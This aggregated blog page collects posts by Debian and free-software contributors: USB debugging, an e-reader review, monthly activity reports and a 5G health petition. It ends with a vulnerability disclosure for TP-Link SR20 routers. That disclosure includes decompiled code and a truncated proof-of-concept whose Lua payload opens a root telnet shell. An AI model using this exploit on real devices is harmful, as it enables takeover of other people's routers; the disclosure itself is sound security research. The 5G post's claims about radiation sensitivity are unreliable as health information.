USB is an odd protocol; data from the device to the host has to sit in the device waiting for the host to come and ask for it. When the device is in use, the host polls for data by sending an IN packet. When there's no data to send back, the device sends a NAK reply. When there is data, the device sends a DATAx packet and the host replies with an ACK packet.

In my case, the host sends thousands of IN packets waiting for data, and the device responds with an equally huge number of NAK packets. The first time data was queued from the device to the host, the device responded to the IN packet with a DATAx packet and the host ACK'd that. After that, the host never sent another IN packet again. It would happily send its own data using OUT packets, and the device would receive that data, and of course the usual stream of SOF (start of frame) packets were streaming along. But, not a single IN packet to be seen.

Differential Debugging

Well, I've got a lot of USB devices around here, so I hooked up one of our TeleBTv3.0 devices. That worked just fine, which was good as we've sold hundreds of those and it would kinda suck to discover that some Windows boxes weren't compatible.

A visual examination of the traces as seen captured by the Beagle analyzer didn't show anything obvious. But, it's often the little details that break things.

So, I hacked up the SAMD21 board to appear to be the same device as the TeleBT -- same VID/PID, same names, same serial number. Everything.

Now Windows can't seem to tell the difference. It uses the same COM port for both at least.

I devised a simple test — plug-in the device, start PuTTY and then type two characters ('a', or 0x61). Because both devices echo whatever you send to them, this means I should get two characters back. Because they're typed separately, those two characters will be sent in separate OUT transactions, and the echos should be sent back in two IN transactions.

I captured traces from both devices:

TeleBT-v3.0 (STM32L151):

Metro M0 (SAMD21G18A):

The 'trimmed' versions elide timing and packet sequence information which can't be easily replicated exactly between the two tests; that "can't" matter, at least according to my understanding of USB. With those versions, I can do a text diff of the packet traces to find that, aside from a different number of SOF and IN-NAK transactions, the only difference appears at the end:

$ diff -u stm32l.trim samd21.trim | tail +231
 0  1 B  01 04 OUT txn 61   
 1  3 B  01 04    OUT packet E1 01 BA   
 1  4 B  01 04    DATA0 packet C3 61 81 57   
 1  1 B  01 04    ACK packet D2   
-0  1 B  01 05 IN txn   [57536 POLL] 61   
-1    01 05    [57536 IN-NAK]    
+0  1 B  01 05 IN txn   [50387 POLL] 61   
+1    01 05    [50387 IN-NAK]    
 1  3 B  01 05    IN packet 69 81 0A   
 1  4 B  01 05    DATA0 packet C3 61 81 57   
 1  1 B  01 05    ACK packet D2   
-0      [1004 SOF]  [Frames: 853 - 1856]   
+0      [2000 SOF]  [Frames: 138 - 89] [Periodic Timeout]  
+0      [2000 SOF]  [Frames: 90 - 41] [Periodic Timeout]  
+0      [572 SOF]  [Frames: 42 - 613]   
 0  1 B  01 04 OUT txn 61   
 1  3 B  01 04    OUT packet E1 01 BA   
 1  4 B  01 04    DATA1 packet 4B 61 81 57   
 1  1 B  01 04    ACK packet D2   
-0  1 B  01 05 IN txn   [83901 POLL] 61   
-1    01 05    [83901 IN-NAK]    
-1  3 B  01 05    IN packet 69 81 0A   
-1  4 B  01 05    DATA1 packet 4B 61 81 57   
-1  1 B  01 05    ACK packet D2   
-0    01 01 [16 IN-NAK]  [Periodic Timeout]  
-0    01 05 [178185 IN-NAK]  [Periodic Timeout]  
-0      [2000 SOF]  [Frames: 1857 - 1808] [Periodic Timeout]  
-0    01 01 [16 IN-NAK]  [Periodic Timeout]  
-0    01 05 [147487 IN-NAK]  [Periodic Timeout]  
-0      [2000 SOF]  [Frames: 1809 - 1760] [Periodic Timeout]  
-0      [474 SOF]  [Frames: 1761 - 186]   
-0    01 05 [34876 IN-NAK]    
-0   ! 01 05 [1 ORPHANED]    
-1   U 01 05    [1 IN]    
-0    01 01 [16 IN-NAK]    
-0      Capture stopped  [Sun 31 Mar 2019 02:25:32 PM PDT]  
+0      [2000 SOF]  [Frames: 614 - 565] [Periodic Timeout]  
+0      [1163 SOF]  [Frames: 566 - 1728]   
+0      Capture stopped  [Sun 31 Mar 2019 02:36:23 PM PDT]  

You can see both boards receiving the first 'a' character and then send that back. Then both boards receive the second 'a' character, but only the stm32l gets the IN packets which it can respond with the DATAx packet containing the 'a' character. The samd21 board gets only SOF packets.

Next Steps?

I'm heading out of town on Tuesday to help with the NASA Student Launch, so I think I'll let this sit until I get back. Maybe I'll come up with a new debugging idea, or maybe I'll hear about a fancier USB monitoring device that might capture details that I'm missing.

Anyone with suggestions or comments is welcome to send them along; I'd like to get this bug squashed and finish the rest of the Snek 1.0 release process.

31 March, 2019 10:21PM

Iustin Pop

Kobo Forma eReader review

An e-ink ebook reader in 2019? Why?

Well, “why not” is too brief, so let’s expand on it a bit.

Why an eReader?

I used eBook readers for a long time, as the eInk format was a reasonably good replacement for paper books. I don’t remember when I started exactly (sometime after 2010), but after my Sony PRS-650 was stolen (argh, stupid me) and I moved to a Sony PRS-T3, my use of it decreased over time.

Not entirely sure why - maybe the slow UI, or the fact that it didn’t have a backlight, or who knows why. Together with my overall reading volume, my ebook use decreased to the extent that maybe I read 2-3 books per year on it. I even have to admit reading more on a tablet, despite the drawbacks (of reading on an LCD screen). One thing I really appreciated on tablets was the fast UI and the large screen. But since Sony closed its eReader division, no new models…

Then, a few weeks back, there was a thread at work about eBook readers vs. tablets, and seeing the people arguing left and right made me look at what would be the choices today when buying a new eReader, and to my surprise, there are pretty large screens available!

The largest ones are only 8 inches, so smaller than a tablet, but is that enough maybe? I read more and the Kobo Forma looked very interesting: good backlight (with blue filter), good size, albeit a very weird form factor.

Fortunately digitec had one in the showroom, so I was able to hold it in my hands, and together with what I read about it I was convinced. Sad to say goodbye to my Sony…

Why Kobo?

From my research, basically the choice is between Kindles and non-Kindles. I have serious reservations about Amazon, and on top of that I prefer the wide availability of the epub format, so the choice, as many times before, was clear.

On the “others” side, it seems there are two main choices, at least in Europe: either Tolino or Kobo. From reading about these two Tolino seems a more restrictive environment, with fewer formats supported. On top of that, it seems that Kobo bought either Tolino or the Tolino brand or the Tolino OS (not entirely sure), so double the argument to go with Kobo.

So on the Kobo large eReader side, there’s either Kobo Aura one, or Kobo Forma, which was much newer (~2 years), and the reviews didn’t point much either way, except that the Forma has also physical buttons (which Sony readers were doing very well). Very clearly then, the Forma it was.

I’d wished the 32 GB model was available, but no, here only the 8GB model is, but that’s enough. So, bought and eager to see how it is.

First impressions

Note: all the handling here is with a cover, not standalone.

The form factor, and especially the asymmetry of the layout: not a problem at all after a couple of hours. Despite still having a 4:3 (1.33×) screen aspect ratio, the (overall) more square ~1.1x ratio is actually well suited visually for landscape reading; the Sony had a 4:3 (1.33×) screen but the body was an almost 1.5× ratio (due to buttons on the bottom), much more book-like, which seems awkward to read in landscape mode, irrespective of actual screen content. So, not only is the form factor not a downside, but it’s actually an advantage!

The backlight works very well, although I only use it in the 0-10% range, and tweaking exact value here is a bit cumbersome. But it works, and the blue light filter is awesomeness++, no problems with it at night - on the contrary, it easily puts me to sleep :) The only small downside is that it eats battery faster, not sure whether due to the backlight or the larger screen, but I presume the former.

The biggest surprise though was how well the large screen is on the eyes, and the fact that it is large enough to enable reading technical books/documents! This I was never able to do on my Sony’s, due to the small size, but on the Forma, double-good. Even diagrams/drawings work OK (not well), so all good.

Portability-wise, it’s large, so doesn’t fit in pockets (and I tried). Aside from that, I can still easily read on the train or while walking so all good.

ePub vs. kePub, oh my!

The first weird thing that one reads about Kobo eReaders is the so-called “kepub” format. Kobo, it seems like many other companies, thought they can do better by having their own eBook format.

But “kepub” is just epub with a custom extension, or at least epub is forward compatible to kepub. Using a book that the reader sees as kepub format brings a couple of advantages:

  • progress report (this chapter left time, overall book left time)
  • per-chapter page numbers (which annoys me to no end)
  • zooming into drawings (double-tap)

The latter is very useful, the first point mildly so, so I’ve settled on using “kepub” as the book format.

Book management

As usual, I manage my eBook collection using Calibre. I have a long collection of books I bought over the years and now over different eReader brands, so I can’t rely on Kobo’s store or any other store to manage my books. Sure I might buy books on Kobo if I really need to, but unless they’re DRM-protected, they’ll go through Calibre before landing on my reader. To be very clear, I buy all my books, but I strongly lean towards DRM-free publishers (which is one reason to avoid a Kindle, but not the only one). I mean here companies such as LeanPub, Manning Publications, etc. Non-exhaustive list, just some recent examples.

Fortunately Calibre works well with the Kobo as well, so moving my books over was easy, at least for the DRM-free ones. But kepub! Even for this there’s a nice solution: the Kobo Touch Extended plugin, which converts to kepub on the fly (and doesn’t require one to store their books in both epub and kepub). That driver works very well, even collection support is there and a bit more flexible than with the Sony’s, and on top it has series support as well, so happy camper.

Collections note: due to how the (native) reader works, setting the book metadata correctly is only possible once the reader has seen the book. So: plug in, transfer from Calibre, eject, insert again, and at this point Calibre can set the collections for the book. Slightly annoying, but not much.

“Hacking” the Kobos

While reading how to configure my reader, to my surprise I learn that installing additional software on these readers is rather trivial. Well, sadly, that means there’s no firmware update protection as in verification, but I guess you can’t have both. The only snag is how to launch this additional software (and then one reads about KSM vs fmon vs kfmon), but otherwise very simple.

So what additional software can one install? Well, to my surprise, the actual “reader” part. While “nickel” (the built-in reader) works well with (k)epub, it still has limitations, some of them small, some of them large. For example: hyphenation support, ligatures, but most of all, PDF (non-reflowable content) support.

I’m fortunate to not have many PDFs (none, actually, I think), but I have to admit this screenshot looks just beautiful. If that link is broken, go to the Plato homepage. There’s also the other option of KOReader, which seems more featured (e.g. native integration with Calibre!). And both of these are open source!

For now, I’m staying with the official reader, but it’s very good to know one has multiple options, especially as you can still use the native reader (i.e. they’re in addition to it, not replacing it).

Conclusion

I’m just less than two weeks with the Forma, and I’ve already read 2½ books on it. For me, that’s surprising—as I was saying, that’s how much I read in the last year on my previous reader. So far I like this device very much, and I definitely recommend it for both normal books and—for the first time—for technical books.

Happy to answer any question (I can) about the device, just ask below.

31 March, 2019 05:24PM

Jonathan Carter

Free Software Activities (2019-03)

Wow. March is over already. Picture above taken on weekend away on a wine farm in Robertson, Western Cape.

Debian packaging work

2019-03-01: Upload new upstream version of bundlewrap (3.6.0-1) to debian unstable.

2019-03-05: Work on updating python-aniso8601 to version 5.1.0, defer upload due to new dependency: relativetimebuilder (needs packaging).

2019-03-11: Upload live-config (5.20190312) to debian unstable (Closes: #921921).

2019-03-12: Upload new upstream version of powerlevel9k (0.6.7-1) to debian unstable.

2019-03-13: File bug for removal of stale python-fabulous-doc package from debian unstable (ROM: #924469).

2019-03-14: Upload new upstream version of gnome-shell-extension-dash-to-panel (19-1) to debian unstable

2019-03-23: Upload new upstream version of bundlewrap (3.6.1-1) to debian unstable.

2019-03-23: Work on updating gamemode (1.2-1 to 1.3-1), some build problems with inih submodules.

2019-03-23: Upload new upstream version of gnome-shell-extension-dashtodock (66-1~exp1) to debian experimental.

2019-03-24: Upload calamares (3.2.4-4) to debian unstable.

2019-03-24: Upload connectagram (1.2.9-4) to debian unstable.

2019-03-24: Upload fracplanet (0.5.1-4) to debian unstable.

2019-03-24: Upload fractalnow (0.8.2-3) to debian unstable.

2019-03-25: Upload new upstream version of xfce4-screensaver (0.1.4-1~exp1) to debian experimental (Closes: #921835).

2019-03-25: Merge MR#1 for calamares (fix typo).

2019-03-26: File ITP for gnome-shell-extension-draw-on-your screen (ITP: #925518).

2019-03-26: Upload live-wrapper (0.9) to debian unstable (Closes: #924000).

2019-03-28: Upload xfce4-screensaver (0.1.3-1~exp2) to debian experimental.

Debian package sponsoring

2019-03-10: Sponsor package jag (0.3.5-4) for debian unstable (e-mail request).

2019-03-12: Sponsor package vitetris (0.57.2-3) for debian unstable (mentors.debian.org request) (Closes: #923969).

2019-03-12: Sponsor package blastem (0.6.3-1) for debian unstable (mentors.debian.org request) (Closes: #924177).

DebConf

Lots of stuff not mentioned here, I’m just not used to tracking this, but will hopefully get better at it.

2019-03-05: Take on two new DebConf roles that will consume a lot of time in the immediate future. I’m joining Nattie in a mentoring role for the DC19 team and heading up the bursaries team for the DC19 cycle.

2019-03-15: DebConf committee meeting to decide DC20 location.

Debian quality assurance

2019-03-11: Spot check latest weekly live builds mostly to check EFI/BIOS status when installing via calamares and current status of all desktop environments.

2019-03-30: Troubleshoot grub/luks/live issues.

Debian project leader campaign

Answered lots of questions throughout the month on the debian-vote list that you can read there.

2019-03-14: Jump into the volcano and declare my self-nomination to run for Debian project leader.

2019-03-18: Submit platform for DPL election to Debian secretary.

2019-03-19: Publish blog post “Running for DPL“.

2019-03-20: Publish blog post “GitLab and Debian“.

2019-03-23: Work on platform rebuttals.

2019-03-26: Publish blog post “DPL 2019 Election: Rebuttals“.

2019-03-28: Publish blog post “Fun and Debian“.

31 March, 2019 04:47PM by jonathan

Chris Lamb

Free software activities in March 2019

Here is my monthly update covering what I have been doing in the free software world during March 2019 (previous month):

  • My activities as the current Debian Project Leader are covered in my Bits from the DPL (March 2019) email to the debian-devel-announce mailing list. Attentive followers of the on-going Debian Project Leader Elections will have noted that I am not running for a consecutive third term, so this was therefore my last such update, at least for the time being…

  • Presented at the Free Software Foundation's 2019 edition of LibrePlanet at Massachusetts Institute of Technology, Cambridge, MA on Redis Labs and the tragedy of the Commons Clause. It was great catching up with a large number of free software friends and colleagues. A splendid event as usual but a special congratulations here to Deb Nicholson for winning the FSF's award for the Advancement of Free Software.

  • As part of my duties of being on the board of directors of the Open Source Initiative I attended our monthly board meeting, participated in various licensing discussions occurring on the internet and formally approved the results of the recent OSI Board Member Election results which, as it happens, means that the Board is now predominantly female.

  • Updated my pull request for the shadow UNIX password system to make the build reproducible in order to support the case where secure_getenv(3) is not provided by the system C library. [...]

  • Opened pull requests for the Toil workflow engine [...] and the Vue.js URL router [...] to make their respective builds reproducible.

  • Attended a Debian Bug Squashing Party in Cambridge, United Kingdom. Thanks to Steve McIntyre for arranging and hosting the event.

  • For the Tails privacy-oriented operating system I reviewed and tested a number of feature branches (eg. #16452 & #16559) as well as contributed to a number of discussions on IRC, the mailing lists and on the issue tracker itself (eg. #16552).

  • Updated my django-agpl library — which makes it easier for Django web applications to satisfy the conditions of the GNU Affero General Public License — to set the correct mimetype for .zip files. [...]

  • Fastmail recently updated their user interface which had broken my Fastmail Enhancement Suite Chrome browser extension, requiring some attention. [...]

  • More hacking on the Lintian static analysis tool for Debian packages:

    • Check for placeholder "<project>" strings in debian/watch files as it can result in uscan(1) generating a file with shell metacharacters. (#923589)
    • Support dh-sequence-{gir,gnome,python3} virtual packages as satisfying various build-dependencies. (#924082)
    • Fix false-positives for the version-substvar-for-external-package tag when the Provides field contains multiple items or leading whitespace. (#833608)
    • Correct false-positives when checking for dh-runit packages that lack a Breaks substitution variable. (#924116)
    • Don't detect non-maintainer upload versions when checking for maintainer scripts that support "ancient" package versions. (#924501)
    • Add itialize to the list of spelling-error-in-binary exceptions. (#923725)
    • Update a large number of tag long descriptions. [...][...][...]


Reproducible builds

Whilst anyone can inspect the source code of free software for malicious flaws almost all software is distributed pre-compiled to end users.

The motivation behind the Reproducible Builds effort is to ensure no flaws have been introduced during this compilation process by promising identical results are always generated from a given source, thus allowing multiple third-parties to come to a consensus on whether a build was compromised.

The initiative is proud to be a member project of the Software Freedom Conservancy, a not-for-profit 501(c)(3) charity focused on ethical technology and user freedom. Conservancy acts as a corporate umbrella, allowing projects to operate as non-profit initiatives without managing their own corporate structure. If you like the work of the Conservancy or the Reproducible Builds project, please consider becoming an official supporter.

This month, I:

I also made the following changes to our tooling:

diffoscope

diffoscope is our in-depth and content-aware diff utility that can locate and diagnose reproducibility issues.

  • Always warn if the tlsh module is not available (not just if a specific fuzziness threshold is specified) to match the epilog of the --help output. This prevents missing support for file rename detection. (#29)
  • Provide explicit help when the libarchive system package is missing / incomplete. (#50)
  • Fix a number of tests when using GhostScript 9.20 vs 9.26 for Debian stable vs. the same distribution with the security/point release applied. [...]
  • Improved the displayed comment whenever resorting to a binary diff to mention the file's type. (#49)
  • Make --use-dbgsym a ternary operator to make it easier to totally disable. (re. #2)
  • Explicitly mention when the guestfs module is missing at runtime and thus are falling back to a binary diff. (#45)
  • Tidied definition of the no file-specific differences were detected message suffix. [...]
  • Corrected a "recurse" typo [...] and uploaded version 113 to Debian unstable.

strip-nondeterminism

strip-nondeterminism is our tool to remove specific non-deterministic results from a completed build.


Debian

Patches contributed

  • pymongo: Please update the Homepage field. (#924078)

  • wondershaper: Suggest using $IFACE in an /etc/network/interfaces reference. (#924011)

Debian LTS

This month I have worked 18 hours on Debian Long Term Support (LTS) and 12 hours on its sister Extended LTS project.

  • Investigated and triaged cron, python2.7, python3.4, systemd, openssl (CVE-2019-1543), etc.

  • Frontdesk duties, responding to user/developer questions, reviewing others' packages, etc., particularly around the removal of the wheezy and jessie suites.

  • Issued DLA 1719-1 — it was discovered that there was a denial of service vulnerability in the libjpeg-turbo JPEG image library. A heap-based buffer over-read could be triggered by a specially-crafted bitmap file.

  • Uploaded ruby-i18n 0.7.0-2+deb9u1 to stretch-security to prevent a remote denial-of-service vulnerability via an application crash. (#913093)

  • Updated the website to add some missing announcement texts.

Uploads

Finally, I also made the following non-maintainer uploads (NMUs) to fix release-critical (RC) bugs for the upcoming Debian buster release:

FTP Team

As a Debian FTP assistant I ACCEPTed 14 packages: gcc-9, gcc-9-cross, gcc-9-cross-ports, gnome-shell-extension-bluetooth-quick-connect, golang-github-facebookgo-structtag, golang-github-rs-zerolog, golang-gopkg-stretchr-testify.v1, httpdirfs-fuse, maint-guide, nvidia-graphics-drivers, piuparts, pyglet, qtbase-opensource-src & qtdeclarative-opensource-src.

31 March, 2019 03:55PM

Joerg Jaspert

Miscellaneous, DPL election, Archive changes, Craziness

Miscellaneous

As usual, a long time since my last blog. Not that I have been idle, but usually I prefer doing real things over blogging. But hey, here goes one, could be getting long too.

A lot happened since I last blogged. Let's start with the boring stuff: I managed to get myself a slipped disc. Not a boring one either that could be treated “old school”. Would be boring, so I managed to get the whole disc out, leaving 2 bones of my spinal column sit directly on each other. All doctors had been quite surprised and told me they never saw an issue that big.

Surgery, recovery time, life

As it was impossible to do anything except for a surgery, there was no question about it, surgery it had to be. I surprised the docs with telling them Not before day X, as I had a quite important appointment on that day - my son starting school. Day after I let them cut me open and put in an implant.

Recovery times.

Some three and a half hours of surgery are taking an impressive amount of energy out of one, wouldn’t have thought it that bad. Combined with an order to mostly lie down flat for quite a while, it took longer than expected to get back up.

At some point I was told to mostly walk or lie, try not standing still or sitting too much. At the same time the school of my son looked for help during noon hours, so I took my walk time to monitor some elementary school kids. Turns out I am way better at it than anyone expected and they really love me, always asking when I come again, now that I am back at my normal job.

Life

Except for that excitement with a surgery, life is happy normal, which is good. 2 kids around means it is not boring. Work sponsored me a new e-bike, so I am using that a lot - and my older son always wants to go with me. By now he manages 40km tours and plans to reach at least 50km this summer, more if possible. Impressive for a 6, soon 7, year old.

DPL

As some may have noticed, I nominated myself for this year's DPL election. Crazy times, indeed. Got four other candidates, one has withdrawn in the meantime, so we will have a ballot with 5 options (don’t forget famous NOTA).

My company helpfully agreed on quite a bunch of time I can take, should I really get elected, which I think will also help the other areas I am active in.

I won’t bore you with repeating what I said in my platform or on the Debian Vote List, if you are interested in the DPL election business, feel free to read through it all. It is certainly an interesting campaigning period until now.

Whoever will win in the end, I am sure it will be a good DPL.

Archive changes

Something that turned out to be more felt by people out there have been my recent archive changes. I finally went and archived the wheezy release, long out of support it is. And also jessie, which is only partly out of support - LTS is still active.

Deleting files

Just archiving (moving things to the archive.debian.org machines) does not really gain much, the goal is to free up space in the main archive and on the mirrors. Which means deleting the suites and all their files from the archive. For wheezy, that was simple, just use the dak archive tools to set all involved suites empty. Then the usual cleanup processes will get rid of the files, and in a way that mirrors won’t break. Say, deleting only a certain number of files at one mirror push, as our mirrors limit how many files can be deleted at once.

For jessie it was a little more complicated, as the LTS architectures should continue to exist. So it wasn’t a simple “delete it all”, but the right set of files needed to stay around.

Turns out that, while those removals are all fine, at least some suites should continue to stay alive, even if they are empty. Or they generate errors on users’ systems that don’t really need to be. Say, the jessie-updates suite, while being empty and not receiving any updates anymore (LTS goes via security archive only) is configured per default everywhere.

Craziness

A while ago there have been two cases in the Debian project where we had to enforce rules and actively take away membership. Something which never was, nor will it ever be, an easy decision.

One of those cases resolved itself nicely in the meantime, in time for the running DPL election even.

The other one seems hell bent on proving our decision right every other day. And ensuring they won’t ever be able to be called Debian Developer, as sad as it is. It is astonishing how much one can defy reality, spit out lies and false accusations and live in a bubble. The sad thing just being how much energy this is needlessly taking away from all people involved.

31 March, 2019 09:09AM

March 30, 2019

Molly de Blanc

Free software activities (March, 2019)

March was overrun with work, work, work. Planning a conference takes a lot out of you and consumes a lot of time, even when you’re getting paid to do it.

A photo of a branch of kwanzen cherry tree blossoms, several of which are budding and several of which are in full bloom.

I used to volunteer to run conferences and, looking back on it, I don’t know how we managed with a part-time, all volunteer crew. LibrePlanet is organized by the FSF staff, with various pre-conference help from technical volunteers, and a small army of volunteers at the conference itself.

March activities (personal)

  • I ran for and was re-elected to the Open Source Initiative board of directors.
  • The OSI had one board meeting, and a call to ratify the results of the elections.
  • I worked on talks for FOSS North and Linux Fest North West.
  • I applied to speak at All Things Open.
  • I applied to speak at !!con and was subsequently rejected. #speakerlife.
  • I submitted sessions to DebConf 19 AND YOU SHOULD TOO.
  • I attended my first Bug Squashing Party in Paris!
  • Along with the rest of the Debian Outreach Team, I worked on the project’s participation in Outreachy and GSoC.
  • The Debian A-H team met, and handled incident reports.
  • March brought the 8th and 9th instances –the latter just under the wire — of people being mean to me on the internet. I had a mocha and a cappuccino, respectively. Edit: The 10th instance also happened in March. I almost missed it! -mdb March 31, 2019.

March activities (professional)

  • I (along with an amazing team) ran a conference. That’s pretty much all I did.

30 March, 2019 02:48PM by mollydb

Daniel Stender

Series of screencasts related to DevOps and Debian packaging

Howdy! I’ve begun a series of DevOps and Debian packaging related screencasts which are provided on a channel at Youtube.

At the moment there is:

The screencasts are straightforward without any fuss: you have to type in this and that happens. More stuff is coming up if there are some subscriptions.

30 March, 2019 06:37AM

March 29, 2019

Mike Gabriel

Picnic in the Dead Zone

Today, I talked to Christoph. He is from a local, rather new initiative here in Northern Germany:

     Picknick im Funkloch

(Picnic in the Dead Zone).

We discussed how DAS-NETZWERKTEAM (my FLOSS business) can support that initiative on the technical level (we will start with mailing lists).

The Picnic in the Dead Zone initiative aims at making people more aware of possible health and social consequences that may be caused by the upcoming 5G mobile standard reaching 90%-plus coverage.

Personally, I know individual people who are (highly) sensitive to electro-magnetic radiation and fields (they can tell you if wireless network is on or off, tell you which access point where in the house is on or off, can differentiate between WiFi and PowerLAN, etc.). For people with such a sensitivity it is crucial to have spots in the country they want to live in, where electro-magnetic radiation is at a minimum level. Mobile connectivity does not work for everyone. Hyper-sensitive people suffer from it, in fact.

@all-the-Germans: Currently, there is an ePetition waiting for (maybe your) signature(s) on the German Bundestag's ePetition home page. The signing deadline is pretty close: 4th April 2019. If you think that we should re-consider the whole 5G technology once more, study its impact on animal (including ourselves) physiology and plant physiology a little bit better, then please take some time and visit this URL and consider signing the following petition (if so, do it asap):

https://epetitionen.bundestag.de/petitionen/_2018/_12/_05/Petition_88260...

light+love
Mike

29 March, 2019 09:13PM by sunweaver

Louis-Philippe Véronneau

Montreal's Debian & Stuff - April 2019

We had another Debian & Stuff in Montreal last weekend. Some people from the local FOSS community wanted to gather and watch the LibrePlanet 2019 livestream and we thought merging it with a D&S would be a good idea.

People came and went, but all in all around 10 people showed up and we had tons of fun. I ended up hacking some more on my Tor Puppet module and played around with packaging the Tomu's bootloader in Debian.

Some of the talks were really great. The videos aren't online yet, but if you eventually want to watch some of them, Tarek Loubani's opening keynote on FOSS and medical devices in Gaza was amazing (and hard to watch[1]). I also really enjoyed Shauna Gordon-McKeon's talk on governing the software commons.

Thanks to the folks at Koumbit for hosting us!


  1. Amongst other things, he played videos of Israeli soldiers cheerfully sniping civilians, showed multiple pictures of kids losing limbs and told us how a fellow doctor he was working with got pinned down and killed by sniper rounds fired by the IDF while trying to rescue injured civilians.

29 March, 2019 08:45PM by Louis-Philippe Véronneau

Martin Michlmayr

FOSSASIA 2019 in Singapore

I attended FOSSASIA earlier this month. This conference has been on my radar for many years but I never managed to attend before.

I was impressed by the organization of the conference. Furthermore, I liked that the audience was completely different to the conferences I normally attend. There were so many new people. FOSSASIA has grown not just to be a conference, but also an umbrella organization for several open source projects.

I gave a talk about open source culture, using Debian as an example. I find this type of presentation important because this is where a lot of pitfalls are for many new contributors. Learning technologies is easy, but figuring out all the unwritten norms and rules of a community can be daunting. Of course, it was particularly interesting to give this talk in an environment where I'm the cultural outsider. While I've visited a number of Asian countries, there's a lot about the different cultures I have yet to learn.

I met a number of Debian contributors, including Andrew Lee, Norbert Preining (who talked about TeX Live), Graham Williams (who used to contribute to Debian in the early days and heads an AI team at Microsoft in Singapore now), Kai Hendry (who used to contribute to Debian) and others. I also spent some time away from the conference to write my DPL platform.

Thank you to Hong Phuc Dang, Mario Behling and all the other organizers and volunteers for a wonderful event!

29 March, 2019 07:42AM by Martin Michlmayr

Dirk Eddelbuettel

drat 0.1.5: New release

A new version of drat just arrived on CRAN. And like the last time in December 2017 it went through as an automatically processed upgrade directly from the CRAN prechecks. Being a simple package can have its upsides…

And like the last time, this release once again draws largely upon contributed pull requests. Neal Fultz cleaned up how Windows paths are handled when inserting Windows (binary) packages. And Christoph Stepper extended the support for binary packages to the helper commands pruneRepo and archivePackages. I added a minor cleanup to a test Neal added in the previous version, and that made a quick and simple release!

drat stands for drat R Archive Template, and helps with easy-to-create and easy-to-use repositories for R packages. Since its inception in early 2015 it has found reasonably widespread adoption among R users because repositories with marked releases are the better way to distribute code.

As your mother told you: Friends don’t let friends install random git commit snapshots. Rolled-up release it is. And despite what some (who may not know it well) say, drat is actually rather easy to use, documented by five vignettes and just works.

The NEWS file summarises the release as follows:

Changes in drat version 0.1.5 (2019-03-28)

  • Changes in drat functionality

    • Windows paths are handled better when inserting packages (Neal Fultz in #70)

    • Binary packages are now supported for the pruneRepo and archivePackages commands (Christoph Stepper in #79).

  • Changes in drat documentation

    • Properly prefix R path in system call in a tests (Dirk in minor cleanup to #70).

Courtesy of CRANberries, there is a comparison to the previous release. More detailed information is on the drat page.

This post by Dirk Eddelbuettel originated on his Thinking inside the box blog. Please report excessive re-aggregation in third-party for-profit settings.

29 March, 2019 01:34AM

March 28, 2019

Matthew Garrett

Remote code execution as root from the local network on TP-Link SR20 routers

The TP-Link SR20[1] is a combination Zigbee/ZWave hub and router, with a touchscreen for configuration and control. Firmware binaries are available here. If you download one and run it through binwalk, one of the things you find is an executable called tddp. Running arm-linux-gnu-nm -D against it shows that it imports popen(), which is generally a bad sign - popen() passes its argument directly to the shell, so if there's any way to get user controlled input into a popen() call you're basically guaranteed victory. That flagged it as something worth looking at, but in the end what I found was far funnier.

Tddp is the TP-Link Device Debug Protocol. It runs on most TP-Link devices in one form or another, but different devices have different functionality. What is common is the protocol, which has been previously described. The interesting thing is that while version 2 of the protocol is authenticated and requires knowledge of the admin password on the router, version 1 is unauthenticated.

Dumping tddp into Ghidra makes it pretty easy to find a function that calls recvfrom(), the call that copies information from a network socket. It looks at the first byte of the packet and uses this to determine which protocol is in use, and passes the packet on to a different dispatcher depending on the protocol version. For version 1, the dispatcher just looks at the second byte of the packet and calls a different function depending on its value. 0x31 is CMD_FTEST_CONFIG, and this is where things get super fun.

Here's a cut down decompilation of the function:
int ftest_config(char *byte) {
  /* Decompiler output: iParm1 below is Ghidra's name for the first
     parameter (declared as byte above). */
  int lua_State;
  char *remote_address;
  int err;
  int luaerr;
  char filename[64];
  char configFile[64];
  char luaFile[64];
  int attempts;
  char *payload;

  attempts = 4;
  memset(luaFile,0,0x40);
  memset(configFile,0,0x40);
  memset(filename,0,0x40);
  lua_State = luaL_newstate();
  payload = iParm1 + 0xb027;
  if (payload != 0x00) {
    sscanf(payload,"%[^;];%s",luaFile,configFile);
    if ((luaFile[0] == 0) || (configFile[0] == 0)) {
      printf("[%s():%d] luaFile or configFile len error.\n","tddp_cmd_configSet",0x22b);
    }
    else {
      remote_address = inet_ntoa(*(in_addr *)(iParm1 + 4));
      tddp_execCmd("cd /tmp;tftp -gr %s %s &",luaFile,remote_address);
      sprintf(filename,"/tmp/%s",luaFile);
      while (0 < attempts) {
        sleep(1);
        err = access(filename,0);
        if (err == 0) break;
        attempts = attempts + -1;
      }
      if (attempts == 0) {
        printf("[%s():%d] lua file [%s] don\'t exsit.\n","tddp_cmd_configSet",0x23e,filename);
      }
      else {
        if (lua_State != 0) {
          luaL_openlibs(lua_State);
          luaerr = luaL_loadfile(lua_State,filename);
          if (luaerr == 0) {
            luaerr = lua_pcall(lua_State,0,0xffffffff,0);
          }
          lua_getfield(lua_State,0xffffd8ee,"config_test",luaerr);
          lua_pushstring(lua_State,configFile);
          lua_pushstring(lua_State,remote_address);
          lua_call(lua_State,2,1);
        }
        lua_close(lua_State);
      }
    }
  }
}
Basically, this function parses the packet for a payload containing two strings separated by a semicolon. The first string is a filename, the second a configfile. It then calls tddp_execCmd("cd /tmp; tftp -gr %s %s &",luaFile,remote_address) which executes the tftp command in the background. This connects back to the machine that sent the command and attempts to download a file via tftp corresponding to the filename it sent. The main tddp process waits up to 4 seconds for the file to appear - once it does, it loads the file into a Lua interpreter it initialised earlier, and calls the function config_test() with the name of the config file and the remote address as arguments. Since config_test() is provided by the file that was downloaded from the remote machine, this gives arbitrary code execution in the interpreter, which includes the os.execute method which just runs commands on the host. Since tddp is running as root, you get arbitrary command execution as root.

I reported this to TP-Link in December via their security disclosure form, a process that was made difficult by the "Detailed description" field being limited to 500 characters. The page informed me that I'd hear back within three business days - a couple of weeks later, with no response, I tweeted at them asking for a contact and heard nothing back. Someone else's attempt to report tddp vulnerabilities had a similar outcome, so here we are.

There's a couple of morals here:
  • Don't default to running debug daemons on production firmware seriously how hard is this
  • If you're going to have a security disclosure form, read it


Proof of concept:
#!/usr/bin/python3

# Copyright 2019 Google LLC.
# SPDX-License-Identifier: Apache-2.0
 
# Create a file in your tftp directory with the following contents:
#
#function config_test(config)
#  os.execute("telnetd -l /bin/login.sh")
#end
#
# Execute script as poc.py remoteaddr filename
 
import binascii
import socket
 
port_send = 1040
port_receive = 61000
 
tddp_ver = "01"
tddp_command = "31"
tddp_req = "01"
